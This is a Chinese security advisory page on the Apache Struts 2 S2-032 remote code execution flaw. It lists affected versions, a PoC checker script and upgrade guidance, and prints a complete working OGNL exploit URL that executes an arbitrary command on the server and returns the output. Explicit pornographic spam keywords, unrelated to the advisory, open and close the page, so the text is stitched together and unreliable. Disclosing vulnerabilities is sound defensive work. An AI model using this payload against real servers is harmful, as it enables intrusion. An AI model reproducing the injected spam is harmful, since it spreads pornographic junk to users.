怀孕挺大肚子疯狂高潮AV毛片,全部孕妇毛片丰满孕妇孕交,中国孕妇XXXXXXXXX孕交

  1. <s id="x54xr"><object id="x54xr"></object></s>
    <span id="x54xr"></span>
  2. <s id="x54xr"><object id="x54xr"><blockquote id="x54xr"></blockquote></object></s>
    1. <em id="x54xr"></em>
    2. Struts 2(S2-032)漏洞預警
      2016-4-27
      來源:未知
      點擊數: 5086          作者:未知
      • l  漏洞名稱:

        Struts (S2-032)遠程代碼執行

        l  漏洞影響版本:

        Struts 2.0.0 – Struts 2.3.28(除了2.3.20.22.3.24.2

        l  漏洞細節:

        目前互聯網上已經有攻擊利用的遠程exp,

        其中exp的利用方式為:

        http://xxx.xxx.com.cn/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=id&pp=\\\\A&ppp=%20&encoding=UTF-8

        其中id為遠程執行的代碼

        詳細截圖如下:

        l  漏洞演示:

        目前魔方已經制作了POC腳本可供用戶對目標進行檢測,腳本的使用方式如下:

        python struts2check.py +目標即可

        瀏覽成功返回的鏈接,系統返回如下,頁面即存在漏洞。

         

               附件下載詳細見

               http://blog.cubesec.cn/index.php/2016/04/27/struts2-s2032/

         

        l  修補方案:

        官方解決方案

        Disable Dynamic Method Invocation when possible or upgrade to Apache Struts versions 2.3.20.2, 2.3.24.2 or 2.3.28.1.

         

        防護方案

        目前官方已經推出了2.3.20.2、2.3.24.2和2.3.28.1修復了這個問題,大家可以針對自己所使用的版本進行升級。

         

        下載地址:https://struts.apache.org/download.cgi#struts23281

         

      熱門評論
      • 暫無信息

      驗證碼: 驗證碼,看不清楚?請點擊刷新驗證碼

      地址:廣東省惠州市惠城區東平半島惠州大道20號賽格大廈1608號

      電話:0752-2072178  傳真:0752-2072168-0  郵箱:gdoudi@ouditech.com廣東歐迪科技有限公司 版權所有

      Copyright ©2020 Guangdong Oudi Technology Corporation All Rights Reserved.

      粵ICP備16018732號-1

      怀孕挺大肚子疯狂高潮AV毛片,全部孕妇毛片丰满孕妇孕交,中国孕妇XXXXXXXXX孕交